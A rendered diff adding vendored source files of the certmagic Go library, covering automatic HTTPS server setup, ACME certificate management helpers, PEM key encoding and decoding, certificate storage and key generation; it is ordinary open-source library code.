|
||||
return err
|
||||
}
|
||||
|
||||
httpWg.Add(1)
|
||||
defer httpWg.Done()
|
||||
|
||||
// if we haven't made listeners yet, do so now,
|
||||
// and clean them up when all servers are done
|
||||
lnMu.Lock()
|
||||
if httpLn == nil && httpsLn == nil {
|
||||
httpLn, err = net.Listen("tcp", fmt.Sprintf(":%d", HTTPPort))
|
||||
if err != nil {
|
||||
lnMu.Unlock()
|
||||
return err
|
||||
}
|
||||
|
||||
tlsConfig := cfg.TLSConfig()
|
||||
tlsConfig.NextProtos = append([]string{"h2", "http/1.1"}, tlsConfig.NextProtos...)
|
||||
|
||||
httpsLn, err = tls.Listen("tcp", fmt.Sprintf(":%d", HTTPSPort), tlsConfig)
|
||||
if err != nil {
|
||||
httpLn.Close()
|
||||
httpLn = nil
|
||||
lnMu.Unlock()
|
||||
return err
|
||||
}
|
||||
|
||||
go func() {
|
||||
httpWg.Wait()
|
||||
lnMu.Lock()
|
||||
httpLn.Close()
|
||||
httpsLn.Close()
|
||||
lnMu.Unlock()
|
||||
}()
|
||||
}
|
||||
hln, hsln := httpLn, httpsLn
|
||||
lnMu.Unlock()
|
||||
|
||||
// create HTTP/S servers that are configured
|
||||
// with sane default timeouts and appropriate
|
||||
// handlers (the HTTP server solves the HTTP
|
||||
// challenge and issues redirects to HTTPS,
|
||||
// while the HTTPS server simply serves the
|
||||
// user's handler)
|
||||
httpServer := &http.Server{
|
||||
ReadHeaderTimeout: 5 * time.Second,
|
||||
ReadTimeout: 5 * time.Second,
|
||||
WriteTimeout: 5 * time.Second,
|
||||
IdleTimeout: 5 * time.Second,
|
||||
BaseContext: func(listener net.Listener) context.Context { return ctx },
|
||||
}
|
||||
if len(cfg.Issuers) > 0 {
|
||||
if am, ok := cfg.Issuers[0].(*ACMEIssuer); ok {
|
||||
httpServer.Handler = am.HTTPChallengeHandler(http.HandlerFunc(httpRedirectHandler))
|
||||
}
|
||||
}
|
||||
httpsServer := &http.Server{
|
||||
ReadHeaderTimeout: 10 * time.Second,
|
||||
ReadTimeout: 30 * time.Second,
|
||||
WriteTimeout: 2 * time.Minute,
|
||||
IdleTimeout: 5 * time.Minute,
|
||||
Handler: mux,
|
||||
BaseContext: func(listener net.Listener) context.Context { return ctx },
|
||||
}
|
||||
|
||||
log.Printf("%v Serving HTTP->HTTPS on %s and %s",
|
||||
domainNames, hln.Addr(), hsln.Addr())
|
||||
|
||||
go httpServer.Serve(hln)
|
||||
return httpsServer.Serve(hsln)
|
||||
}
|
||||
|
||||
func httpRedirectHandler(w http.ResponseWriter, r *http.Request) {
|
||||
toURL := "https://"
|
||||
|
||||
// since we redirect to the standard HTTPS port, we
|
||||
// do not need to include it in the redirect URL
|
||||
requestHost := hostOnly(r.Host)
|
||||
|
||||
toURL += requestHost
|
||||
toURL += r.URL.RequestURI()
|
||||
|
||||
// get rid of this disgusting unencrypted HTTP connection 🤢
|
||||
w.Header().Set("Connection", "close")
|
||||
|
||||
http.Redirect(w, r, toURL, http.StatusMovedPermanently)
|
||||
}
|
||||
|
||||
// TLS enables management of certificates for domainNames
|
||||
// and returns a valid tls.Config. It uses the Default
|
||||
// config.
|
||||
//
|
||||
// Because this is a convenience function that returns
|
||||
// only a tls.Config, it does not assume HTTP is being
|
||||
// served on the HTTP port, so the HTTP challenge is
|
||||
// disabled (no HTTPChallengeHandler is necessary). The
|
||||
// package variable Default is modified so that the
|
||||
// HTTP challenge is disabled.
|
||||
//
|
||||
// Calling this function signifies your acceptance to
|
||||
// the CA's Subscriber Agreement and/or Terms of Service.
|
||||
func TLS(domainNames []string) (*tls.Config, error) {
|
||||
DefaultACME.Agreed = true
|
||||
DefaultACME.DisableHTTPChallenge = true
|
||||
cfg := NewDefault()
|
||||
return cfg.TLSConfig(), cfg.ManageSync(context.Background(), domainNames)
|
||||
}
|
||||
|
||||
// Listen manages certificates for domainName and returns a
|
||||
// TLS listener. It uses the Default config.
|
||||
//
|
||||
// Because this convenience function returns only a TLS-enabled
|
||||
// listener and does not presume HTTP is also being served,
|
||||
// the HTTP challenge will be disabled. The package variable
|
||||
// Default is modified so that the HTTP challenge is disabled.
|
||||
//
|
||||
// Calling this function signifies your acceptance to
|
||||
// the CA's Subscriber Agreement and/or Terms of Service.
|
||||
func Listen(domainNames []string) (net.Listener, error) {
|
||||
DefaultACME.Agreed = true
|
||||
DefaultACME.DisableHTTPChallenge = true
|
||||
cfg := NewDefault()
|
||||
err := cfg.ManageSync(context.Background(), domainNames)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
return tls.Listen("tcp", fmt.Sprintf(":%d", HTTPSPort), cfg.TLSConfig())
|
||||
}
|
||||
|
||||
// ManageSync obtains certificates for domainNames and keeps them
|
||||
// renewed using the Default config.
|
||||
//
|
||||
// This is a slightly lower-level function; you will need to
|
||||
// wire up support for the ACME challenges yourself. You can
|
||||
// obtain a Config to help you do that by calling NewDefault().
|
||||
//
|
||||
// You will need to ensure that you use a TLS config that gets
|
||||
// certificates from this Config and that the HTTP and TLS-ALPN
|
||||
// challenges can be solved. The easiest way to do this is to
|
||||
// use NewDefault().TLSConfig() as your TLS config and to wrap
|
||||
// your HTTP handler with NewDefault().HTTPChallengeHandler().
|
||||
// If you don't have an HTTP server, you will need to disable
|
||||
// the HTTP challenge.
|
||||
//
|
||||
// If you already have a TLS config you want to use, you can
|
||||
// simply set its GetCertificate field to
|
||||
// NewDefault().GetCertificate.
|
||||
//
|
||||
// Calling this function signifies your acceptance to
|
||||
// the CA's Subscriber Agreement and/or Terms of Service.
|
||||
func ManageSync(ctx context.Context, domainNames []string) error {
|
||||
DefaultACME.Agreed = true
|
||||
return NewDefault().ManageSync(ctx, domainNames)
|
||||
}
|
||||
|
||||
// ManageAsync is the same as ManageSync, except that
|
||||
// certificates are managed asynchronously. This means
|
||||
// that the function will return before certificates
|
||||
// are ready, and errors that occur during certificate
|
||||
// obtain or renew operations are only logged. It is
|
||||
// vital that you monitor the logs if using this method,
|
||||
// which is only recommended for automated/non-interactive
|
||||
// environments.
|
||||
func ManageAsync(ctx context.Context, domainNames []string) error {
|
||||
DefaultACME.Agreed = true
|
||||
return NewDefault().ManageAsync(ctx, domainNames)
|
||||
}
|
||||
|
||||
// OnDemandConfig configures on-demand TLS (certificate
|
||||
// operations as-needed, like during TLS handshakes,
|
||||
// rather than immediately).
|
||||
//
|
||||
// When this package's high-level convenience functions
|
||||
// are used (HTTPS, Manage, etc., where the Default
|
||||
// config is used as a template), this struct regulates
|
||||
// certificate operations using an implicit whitelist
|
||||
// containing the names passed into those functions if
|
||||
// no DecisionFunc is set. This ensures some degree of
|
||||
// control by default to avoid certificate operations for
|
||||
// aribtrary domain names. To override this whitelist,
|
||||
// manually specify a DecisionFunc. To impose rate limits,
|
||||
// specify your own DecisionFunc.
|
||||
type OnDemandConfig struct {
|
||||
// If set, this function will be called to determine
|
||||
// whether a certificate can be obtained or renewed
|
||||
// for the given name. If an error is returned, the
|
||||
// request will be denied.
|
||||
DecisionFunc func(name string) error
|
||||
|
||||
// List of whitelisted hostnames (SNI values) for
|
||||
// deferred (on-demand) obtaining of certificates.
|
||||
// Used only by higher-level functions in this
|
||||
// package to persist the list of hostnames that
|
||||
// the config is supposed to manage. This is done
|
||||
// because it seems reasonable that if you say
|
||||
// "Manage [domain names...]", then only those
|
||||
// domain names should be able to have certs;
|
||||
// we don't NEED this feature, but it makes sense
|
||||
// for higher-level convenience functions to be
|
||||
// able to retain their convenience (alternative
|
||||
// is: the user manually creates a DecisionFunc
|
||||
// that whitelists the same names it already
|
||||
// passed into Manage) and without letting clients
|
||||
// have their run of any domain names they want.
|
||||
// Only enforced if len > 0.
|
||||
hostWhitelist []string
|
||||
}
|
||||
|
||||
func (o *OnDemandConfig) whitelistContains(name string) bool {
|
||||
for _, n := range o.hostWhitelist {
|
||||
if strings.EqualFold(n, name) {
|
||||
return true
|
||||
}
|
||||
}
|
||||
return false
|
||||
}
|
||||
|
||||
// isLoopback returns true if the hostname of addr looks
|
||||
// explicitly like a common local hostname. addr must only
|
||||
// be a host or a host:port combination.
|
||||
func isLoopback(addr string) bool {
|
||||
host := hostOnly(addr)
|
||||
return host == "localhost" ||
|
||||
strings.Trim(host, "[]") == "::1" ||
|
||||
strings.HasPrefix(host, "127.")
|
||||
}
|
||||
|
||||
// isInternal returns true if the IP of addr
|
||||
// belongs to a private network IP range. addr
|
||||
// must only be an IP or an IP:port combination.
|
||||
// Loopback addresses are considered false.
|
||||
func isInternal(addr string) bool {
|
||||
privateNetworks := []string{
|
||||
"10.0.0.0/8",
|
||||
"172.16.0.0/12",
|
||||
"192.168.0.0/16",
|
||||
"fc00::/7",
|
||||
}
|
||||
host := hostOnly(addr)
|
||||
ip := net.ParseIP(host)
|
||||
if ip == nil {
|
||||
return false
|
||||
}
|
||||
for _, privateNetwork := range privateNetworks {
|
||||
_, ipnet, _ := net.ParseCIDR(privateNetwork)
|
||||
if ipnet.Contains(ip) {
|
||||
return true
|
||||
}
|
||||
}
|
||||
return false
|
||||
}
|
||||
|
||||
// hostOnly returns only the host portion of hostport.
|
||||
// If there is no port or if there is an error splitting
|
||||
// the port off, the whole input string is returned.
|
||||
func hostOnly(hostport string) string {
|
||||
host, _, err := net.SplitHostPort(hostport)
|
||||
if err != nil {
|
||||
return hostport // OK; probably had no port to begin with
|
||||
}
|
||||
return host
|
||||
}
|
||||
|
||||
// PreChecker is an interface that can be optionally implemented by
|
||||
// Issuers. Pre-checks are performed before each call (or batch of
|
||||
// identical calls) to Issue(), giving the issuer the option to ensure
|
||||
// it has all the necessary information/state.
|
||||
type PreChecker interface {
|
||||
PreCheck(ctx context.Context, names []string, interactive bool) error
|
||||
}
|
||||
|
||||
// Issuer is a type that can issue certificates.
|
||||
type Issuer interface {
|
||||
// Issue obtains a certificate for the given CSR. It
|
||||
// must honor context cancellation if it is long-running.
|
||||
// It can also use the context to find out if the current
|
||||
// call is part of a retry, via AttemptsCtxKey.
|
||||
Issue(ctx context.Context, request *x509.CertificateRequest) (*IssuedCertificate, error)
|
||||
|
||||
// IssuerKey must return a string that uniquely identifies
|
||||
// this particular configuration of the Issuer such that
|
||||
// any certificates obtained by this Issuer will be treated
|
||||
// as identical if they have the same SANs.
|
||||
//
|
||||
// Certificates obtained from Issuers with the same IssuerKey
|
||||
// will overwrite others with the same SANs. For example, an
|
||||
// Issuer might be able to obtain certificates from different
|
||||
// CAs, say A and B. It is likely that the CAs have different
|
||||
// use cases and purposes (e.g. testing and production), so
|
||||
// their respective certificates should not overwrite eaach
|
||||
// other.
|
||||
IssuerKey() string
|
||||
}
|
||||
|
||||
// Revoker can revoke certificates. Reason codes are defined
|
||||
// by RFC 5280 §5.3.1: https://tools.ietf.org/html/rfc5280#section-5.3.1
|
||||
// and are available as constants in our ACME library.
|
||||
type Revoker interface {
|
||||
Revoke(ctx context.Context, cert CertificateResource, reason int) error
|
||||
}
|
||||
|
||||
// Manager is a type that manages certificates (keeps them renewed) such
|
||||
// that we can get certificates during TLS handshakes to immediately serve
|
||||
// to clients.
|
||||
//
|
||||
// TODO: This is an EXPERIMENTAL API. It is subject to change/removal.
|
||||
type Manager interface {
|
||||
// GetCertificate returns the certificate to use to complete the handshake.
|
||||
// Since this is called during every TLS handshake, it must be very fast and not block.
|
||||
// Returning (nil, nil) is valid and is simply treated as a no-op.
|
||||
GetCertificate(context.Context, *tls.ClientHelloInfo) (*tls.Certificate, error)
|
||||
}
|
||||
|
||||
// KeyGenerator can generate a private key.
|
||||
type KeyGenerator interface {
|
||||
// GenerateKey generates a private key. The returned
|
||||
// PrivateKey must be able to expose its associated
|
||||
// public key.
|
||||
GenerateKey() (crypto.PrivateKey, error)
|
||||
}
|
||||
|
||||
// IssuedCertificate represents a certificate that was just issued.
|
||||
type IssuedCertificate struct {
|
||||
// The PEM-encoding of DER-encoded ASN.1 data.
|
||||
Certificate []byte
|
||||
|
||||
// Any extra information to serialize alongside the
|
||||
// certificate in storage.
|
||||
Metadata interface{}
|
||||
}
|
||||
|
||||
// CertificateResource associates a certificate with its private
|
||||
// key and other useful information, for use in maintaining the
|
||||
// certificate.
|
||||
type CertificateResource struct {
|
||||
// The list of names on the certificate;
|
||||
// for convenience only.
|
||||
SANs []string `json:"sans,omitempty"`
|
||||
|
||||
// The PEM-encoding of DER-encoded ASN.1 data
|
||||
// for the cert or chain.
|
||||
CertificatePEM []byte `json:"-"`
|
||||
|
||||
// The PEM-encoding of the certificate's private key.
|
||||
PrivateKeyPEM []byte `json:"-"`
|
||||
|
||||
// Any extra information associated with the certificate,
|
||||
// usually provided by the issuer implementation.
|
||||
IssuerData interface{} `json:"issuer_data,omitempty"`
|
||||
|
||||
// The unique string identifying the issuer of the
|
||||
// certificate; internally useful for storage access.
|
||||
issuerKey string `json:"-"`
|
||||
}
|
||||
|
||||
// NamesKey returns the list of SANs as a single string,
|
||||
// truncated to some ridiculously long size limit. It
|
||||
// can act as a key for the set of names on the resource.
|
||||
func (cr *CertificateResource) NamesKey() string {
|
||||
sort.Strings(cr.SANs)
|
||||
result := strings.Join(cr.SANs, ",")
|
||||
if len(result) > 1024 {
|
||||
const trunc = "_trunc"
|
||||
result = result[:1024-len(trunc)] + trunc
|
||||
}
|
||||
return result
|
||||
}
|
||||
|
||||
// Default contains the package defaults for the
|
||||
// various Config fields. This is used as a template
|
||||
// when creating your own Configs with New() or
|
||||
// NewDefault(), and it is also used as the Config
|
||||
// by all the high-level functions in this package
|
||||
// that abstract away most configuration (HTTPS(),
|
||||
// TLS(), Listen(), etc).
|
||||
//
|
||||
// The fields of this value will be used for Config
|
||||
// fields which are unset. Feel free to modify these
|
||||
// defaults, but do not use this Config by itself: it
|
||||
// is only a template. Valid configurations can be
|
||||
// obtained by calling New() (if you have your own
|
||||
// certificate cache) or NewDefault() (if you only
|
||||
// need a single config and want to use the default
|
||||
// cache).
|
||||
//
|
||||
// Even if the Issuers or Storage fields are not set,
|
||||
// defaults will be applied in the call to New().
|
||||
var Default = Config{
|
||||
RenewalWindowRatio: DefaultRenewalWindowRatio,
|
||||
Storage: defaultFileStorage,
|
||||
KeySource: DefaultKeyGenerator,
|
||||
}
|
||||
|
||||
const (
|
||||
// HTTPChallengePort is the officially-designated port for
|
||||
// the HTTP challenge according to the ACME spec.
|
||||
HTTPChallengePort = 80
|
||||
|
||||
// TLSALPNChallengePort is the officially-designated port for
|
||||
// the TLS-ALPN challenge according to the ACME spec.
|
||||
TLSALPNChallengePort = 443
|
||||
)
|
||||
|
||||
// Port variables must remain their defaults unless you
|
||||
// forward packets from the defaults to whatever these
|
||||
// are set to; otherwise ACME challenges will fail.
|
||||
var (
|
||||
// HTTPPort is the port on which to serve HTTP
|
||||
// and, as such, the HTTP challenge (unless
|
||||
// Default.AltHTTPPort is set).
|
||||
HTTPPort = 80
|
||||
|
||||
// HTTPSPort is the port on which to serve HTTPS
|
||||
// and, as such, the TLS-ALPN challenge
|
||||
// (unless Default.AltTLSALPNPort is set).
|
||||
HTTPSPort = 443
|
||||
)
|
||||
|
||||
// Variables for conveniently serving HTTPS.
|
||||
var (
|
||||
httpLn, httpsLn net.Listener
|
||||
lnMu sync.Mutex
|
||||
httpWg sync.WaitGroup
|
||||
)
|
||||
|
||||
// Maximum size for the stack trace when recovering from panics.
|
||||
const stackTraceBufferSize = 1024 * 128
|
1136
vendor/github.com/caddyserver/certmagic/config.go
generated
vendored
Normal file
1136
vendor/github.com/caddyserver/certmagic/config.go
generated
vendored
Normal file
File diff suppressed because it is too large
Load Diff
368
vendor/github.com/caddyserver/certmagic/crypto.go
generated
vendored
Normal file
368
vendor/github.com/caddyserver/certmagic/crypto.go
generated
vendored
Normal file
@ -0,0 +1,368 @@
|
||||
// Copyright 2015 Matthew Holt
|
||||
//
|
||||
// Licensed under the Apache License, Version 2.0 (the "License");
|
||||
// you may not use this file except in compliance with the License.
|
||||
// You may obtain a copy of the License at
|
||||
//
|
||||
// http://www.apache.org/licenses/LICENSE-2.0
|
||||
//
|
||||
// Unless required by applicable law or agreed to in writing, software
|
||||
// distributed under the License is distributed on an "AS IS" BASIS,
|
||||
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
// See the License for the specific language governing permissions and
|
||||
// limitations under the License.
|
||||
|
||||
package certmagic
|
||||
|
||||
import (
|
||||
"context"
|
||||
"crypto"
|
||||
"crypto/ecdsa"
|
||||
"crypto/ed25519"
|
||||
"crypto/elliptic"
|
||||
"crypto/rand"
|
||||
"crypto/rsa"
|
||||
"crypto/sha256"
|
||||
"crypto/tls"
|
||||
"crypto/x509"
|
||||
"encoding/json"
|
||||
"encoding/pem"
|
||||
"errors"
|
||||
"fmt"
|
||||
"hash/fnv"
|
||||
"io/fs"
|
||||
"sort"
|
||||
"strings"
|
||||
|
||||
"github.com/klauspost/cpuid/v2"
|
||||
"go.uber.org/zap"
|
||||
"golang.org/x/net/idna"
|
||||
)
|
||||
|
||||
// PEMEncodePrivateKey marshals a private key into a PEM-encoded block.
|
||||
// The private key must be one of *ecdsa.PrivateKey, *rsa.PrivateKey, or
|
||||
// *ed25519.PrivateKey.
|
||||
func PEMEncodePrivateKey(key crypto.PrivateKey) ([]byte, error) {
|
||||
var pemType string
|
||||
var keyBytes []byte
|
||||
switch key := key.(type) {
|
||||
case *ecdsa.PrivateKey:
|
||||
var err error
|
||||
pemType = "EC"
|
||||
keyBytes, err = x509.MarshalECPrivateKey(key)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
case *rsa.PrivateKey:
|
||||
pemType = "RSA"
|
||||
keyBytes = x509.MarshalPKCS1PrivateKey(key)
|
||||
case ed25519.PrivateKey:
|
||||
var err error
|
||||
pemType = "ED25519"
|
||||
keyBytes, err = x509.MarshalPKCS8PrivateKey(key)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
default:
|
||||
return nil, fmt.Errorf("unsupported key type: %T", key)
|
||||
}
|
||||
pemKey := pem.Block{Type: pemType + " PRIVATE KEY", Bytes: keyBytes}
|
||||
return pem.EncodeToMemory(&pemKey), nil
|
||||
}
|
||||
|
||||
// PEMDecodePrivateKey loads a PEM-encoded ECC/RSA private key from an array of bytes.
|
||||
// Borrowed from Go standard library, to handle various private key and PEM block types.
|
||||
func PEMDecodePrivateKey(keyPEMBytes []byte) (crypto.Signer, error) {
|
||||
// Modified from original:
|
||||
// https://github.com/golang/go/blob/693748e9fa385f1e2c3b91ca9acbb6c0ad2d133d/src/crypto/tls/tls.go#L291-L308
|
||||
// https://github.com/golang/go/blob/693748e9fa385f1e2c3b91ca9acbb6c0ad2d133d/src/crypto/tls/tls.go#L238
|
||||
|
||||
keyBlockDER, _ := pem.Decode(keyPEMBytes)
|
||||
|
||||
if keyBlockDER == nil {
|
||||
return nil, fmt.Errorf("failed to decode PEM block containing private key")
|
||||
}
|
||||
|
||||
if keyBlockDER.Type != "PRIVATE KEY" && !strings.HasSuffix(keyBlockDER.Type, " PRIVATE KEY") {
|
||||
return nil, fmt.Errorf("unknown PEM header %q", keyBlockDER.Type)
|
||||
}
|
||||
|
||||
if key, err := x509.ParsePKCS1PrivateKey(keyBlockDER.Bytes); err == nil {
|
||||
return key, nil
|
||||
}
|
||||
|
||||
if key, err := x509.ParsePKCS8PrivateKey(keyBlockDER.Bytes); err == nil {
|
||||
switch key := key.(type) {
|
||||
case *rsa.PrivateKey, *ecdsa.PrivateKey, ed25519.PrivateKey:
|
||||
return key.(crypto.Signer), nil
|
||||
default:
|
||||
return nil, fmt.Errorf("found unknown private key type in PKCS#8 wrapping: %T", key)
|
||||
}
|
||||
}
|
||||
|
||||
if key, err := x509.ParseECPrivateKey(keyBlockDER.Bytes); err == nil {
|
||||
return key, nil
|
||||
}
|
||||
|
||||
return nil, fmt.Errorf("unknown private key type")
|
||||
}
|
||||
|
||||
// parseCertsFromPEMBundle parses a certificate bundle from top to bottom and returns
|
||||
// a slice of x509 certificates. This function will error if no certificates are found.
|
||||
func parseCertsFromPEMBundle(bundle []byte) ([]*x509.Certificate, error) {
|
||||
var certificates []*x509.Certificate
|
||||
var certDERBlock *pem.Block
|
||||
for {
|
||||
certDERBlock, bundle = pem.Decode(bundle)
|
||||
if certDERBlock == nil {
|
||||
break
|
||||
}
|
||||
if certDERBlock.Type == "CERTIFICATE" {
|
||||
cert, err := x509.ParseCertificate(certDERBlock.Bytes)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
certificates = append(certificates, cert)
|
||||
}
|
||||
}
|
||||
if len(certificates) == 0 {
|
||||
return nil, fmt.Errorf("no certificates found in bundle")
|
||||
}
|
||||
return certificates, nil
|
||||
}
|
||||
|
||||
// fastHash hashes input using a hashing algorithm that
|
||||
// is fast, and returns the hash as a hex-encoded string.
|
||||
// Do not use this for cryptographic purposes.
|
||||
func fastHash(input []byte) string {
|
||||
h := fnv.New32a()
|
||||
h.Write(input)
|
||||
return fmt.Sprintf("%x", h.Sum32())
|
||||
}
|
||||
|
||||
// saveCertResource saves the certificate resource to disk. This
|
||||
// includes the certificate file itself, the private key, and the
|
||||
// metadata file.
|
||||
func (cfg *Config) saveCertResource(ctx context.Context, issuer Issuer, cert CertificateResource) error {
|
||||
metaBytes, err := json.MarshalIndent(cert, "", "\t")
|
||||
if err != nil {
|
||||
return fmt.Errorf("encoding certificate metadata: %v", err)
|
||||
}
|
||||
|
||||
issuerKey := issuer.IssuerKey()
|
||||
certKey := cert.NamesKey()
|
||||
|
||||
all := []keyValue{
|
||||
{
|
||||
key: StorageKeys.SitePrivateKey(issuerKey, certKey),
|
||||
value: cert.PrivateKeyPEM,
|
||||
},
|
||||
{
|
||||
key: StorageKeys.SiteCert(issuerKey, certKey),
|
||||
value: cert.CertificatePEM,
|
||||
},
|
||||
{
|
||||
key: StorageKeys.SiteMeta(issuerKey, certKey),
|
||||
value: metaBytes,
|
||||
},
|
||||
}
|
||||
|
||||
return storeTx(ctx, cfg.Storage, all)
|
||||
}
|
||||
|
||||
// loadCertResourceAnyIssuer loads and returns the certificate resource from any
|
||||
// of the configured issuers. If multiple are found (e.g. if there are 3 issuers
|
||||
// configured, and all 3 have a resource matching certNamesKey), then the newest
|
||||
// (latest NotBefore date) resource will be chosen.
|
||||
func (cfg *Config) loadCertResourceAnyIssuer(ctx context.Context, certNamesKey string) (CertificateResource, error) {
|
||||
// we can save some extra decoding steps if there's only one issuer, since
|
||||
// we don't need to compare potentially multiple available resources to
|
||||
// select the best one, when there's only one choice anyway
|
||||
if len(cfg.Issuers) == 1 {
|
||||
return cfg.loadCertResource(ctx, cfg.Issuers[0], certNamesKey)
|
||||
}
|
||||
|
||||
type decodedCertResource struct {
|
||||
CertificateResource
|
||||
issuer Issuer
|
||||
decoded *x509.Certificate
|
||||
}
|
||||
var certResources []decodedCertResource
|
||||
var lastErr error
|
||||
|
||||
// load and decode all certificate resources found with the
|
||||
// configured issuers so we can sort by newest
|
||||
for _, issuer := range cfg.Issuers {
|
||||
certRes, err := cfg.loadCertResource(ctx, issuer, certNamesKey)
|
||||
if err != nil {
|
||||
if errors.Is(err, fs.ErrNotExist) {
|
||||
// not a problem, but we need to remember the error
|
||||
// in case we end up not finding any cert resources
|
||||
// since we'll need an error to return in that case
|
||||
lastErr = err
|
||||
continue
|
||||
}
|
||||
return CertificateResource{}, err
|
||||
}
|
||||
certs, err := parseCertsFromPEMBundle(certRes.CertificatePEM)
|
||||
if err != nil {
|
||||
return CertificateResource{}, err
|
||||
}
|
||||
certResources = append(certResources, decodedCertResource{
|
||||
CertificateResource: certRes,
|
||||
issuer: issuer,
|
||||
decoded: certs[0],
|
||||
})
|
||||
}
|
||||
if len(certResources) == 0 {
|
||||
if lastErr == nil {
|
||||
lastErr = fmt.Errorf("no certificate resources found") // just in case; e.g. no Issuers configured
|
||||
}
|
||||
return CertificateResource{}, lastErr
|
||||
}
|
||||
|
||||
// sort by date so the most recently issued comes first
|
||||
sort.Slice(certResources, func(i, j int) bool {
|
||||
return certResources[j].decoded.NotBefore.Before(certResources[i].decoded.NotBefore)
|
||||
})
|
||||
|
||||
if cfg.Logger != nil {
|
||||
cfg.Logger.Debug("loading managed certificate",
|
||||
zap.String("domain", certNamesKey),
|
||||
zap.Time("expiration", certResources[0].decoded.NotAfter),
|
||||
zap.String("issuer_key", certResources[0].issuer.IssuerKey()),
|
||||
zap.Any("storage", cfg.Storage),
|
||||
)
|
||||
}
|
||||
|
||||
return certResources[0].CertificateResource, nil
|
||||
}
|
||||
|
||||
// loadCertResource loads a certificate resource from the given issuer's storage location.
|
||||
func (cfg *Config) loadCertResource(ctx context.Context, issuer Issuer, certNamesKey string) (CertificateResource, error) {
|
||||
certRes := CertificateResource{issuerKey: issuer.IssuerKey()}
|
||||
|
||||
normalizedName, err := idna.ToASCII(certNamesKey)
|
||||
if err != nil {
|
||||
return CertificateResource{}, fmt.Errorf("converting '%s' to ASCII: %v", certNamesKey, err)
|
||||
}
|
||||
|
||||
keyBytes, err := cfg.Storage.Load(ctx, StorageKeys.SitePrivateKey(certRes.issuerKey, normalizedName))
|
||||
if err != nil {
|
||||
return CertificateResource{}, err
|
||||
}
|
||||
certRes.PrivateKeyPEM = keyBytes
|
||||
certBytes, err := cfg.Storage.Load(ctx, StorageKeys.SiteCert(certRes.issuerKey, normalizedName))
|
||||
if err != nil {
|
||||
return CertificateResource{}, err
|
||||
}
|
||||
certRes.CertificatePEM = certBytes
|
||||
metaBytes, err := cfg.Storage.Load(ctx, StorageKeys.SiteMeta(certRes.issuerKey, normalizedName))
|
||||
if err != nil {
|
||||
return CertificateResource{}, err
|
||||
}
|
||||
err = json.Unmarshal(metaBytes, &certRes)
|
||||
if err != nil {
|
||||
return CertificateResource{}, fmt.Errorf("decoding certificate metadata: %v", err)
|
||||
}
|
||||
|
||||
return certRes, nil
|
||||
}
|
||||
|
||||
// hashCertificateChain computes the unique hash of certChain,
|
||||
// which is the chain of DER-encoded bytes. It returns the
|
||||
// hex encoding of the hash.
|
||||
func hashCertificateChain(certChain [][]byte) string {
|
||||
h := sha256.New()
|
||||
for _, certInChain := range certChain {
|
||||
h.Write(certInChain)
|
||||
}
|
||||
return fmt.Sprintf("%x", h.Sum(nil))
|
||||
}
|
||||
|
||||
func namesFromCSR(csr *x509.CertificateRequest) []string {
|
||||
var nameSet []string
|
||||
nameSet = append(nameSet, csr.DNSNames...)
|
||||
nameSet = append(nameSet, csr.EmailAddresses...)
|
||||
for _, v := range csr.IPAddresses {
|
||||
nameSet = append(nameSet, v.String())
|
||||
}
|
||||
for _, v := range csr.URIs {
|
||||
nameSet = append(nameSet, v.String())
|
||||
}
|
||||
return nameSet
|
||||
}
|
||||
|
||||
// preferredDefaultCipherSuites returns an appropriate
|
||||
// cipher suite to use depending on hardware support
|
||||
// for AES-NI.
|
||||
//
|
||||
// See https://github.com/mholt/caddy/issues/1674
|
||||
func preferredDefaultCipherSuites() []uint16 {
|
||||
if cpuid.CPU.Supports(cpuid.AESNI) {
|
||||
return defaultCiphersPreferAES
|
||||
}
|
||||
return defaultCiphersPreferChaCha
|
||||
}
|
||||
|
||||
var (
|
||||
defaultCiphersPreferAES = []uint16{
|
||||
tls.TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384,
|
||||
tls.TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384,
|
||||
tls.TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256,
|
||||
tls.TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256,
|
||||
tls.TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305,
|
||||
tls.TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305,
|
||||
}
|
||||
defaultCiphersPreferChaCha = []uint16{
|
||||
tls.TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305,
|
||||
tls.TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305,
|
||||
tls.TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384,
|
||||
tls.TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384,
|
||||
tls.TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256,
|
||||
tls.TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256,
|
||||
}
|
||||
)
|
||||
|
||||
// StandardKeyGenerator is the standard, in-memory key source
|
||||
// that uses crypto/rand.
|
||||
type StandardKeyGenerator struct {
|
||||
// The type of keys to generate.
|
||||
KeyType KeyType
|
||||
}
|
||||
|
||||
// GenerateKey generates a new private key according to kg.KeyType.
|
||||
func (kg StandardKeyGenerator) GenerateKey() (crypto.PrivateKey, error) {
|
||||
switch kg.KeyType {
|
||||
case ED25519:
|
||||
_, priv, err := ed25519.GenerateKey(rand.Reader)
|
||||
return priv, err
|
||||
case "", P256:
|
||||
return ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
|
||||
case P384:
|
||||
return ecdsa.GenerateKey(elliptic.P384(), rand.Reader)
|
||||
case RSA2048:
|
||||
return rsa.GenerateKey(rand.Reader, 2048)
|
||||
case RSA4096:
|
||||
return rsa.GenerateKey(rand.Reader, 4096)
|
||||
case RSA8192:
|
||||
return rsa.GenerateKey(rand.Reader, 8192)
|
||||
}
|
||||
return nil, fmt.Errorf("unrecognized or unsupported key type: %s", kg.KeyType)
|
||||
}
|
||||
|
||||
// DefaultKeyGenerator is the default key source.
|
||||
var DefaultKeyGenerator = StandardKeyGenerator{KeyType: P256}
|
||||
|
||||
// KeyType enumerates the known/supported key types.
|
||||
type KeyType string
|
||||
|
||||
// Constants for all key types we support.
|
||||
const (
|
||||
ED25519 = KeyType("ed25519")
|
||||
P256 = KeyType("p256")
|
||||
P384 = KeyType("p384")
|
||||
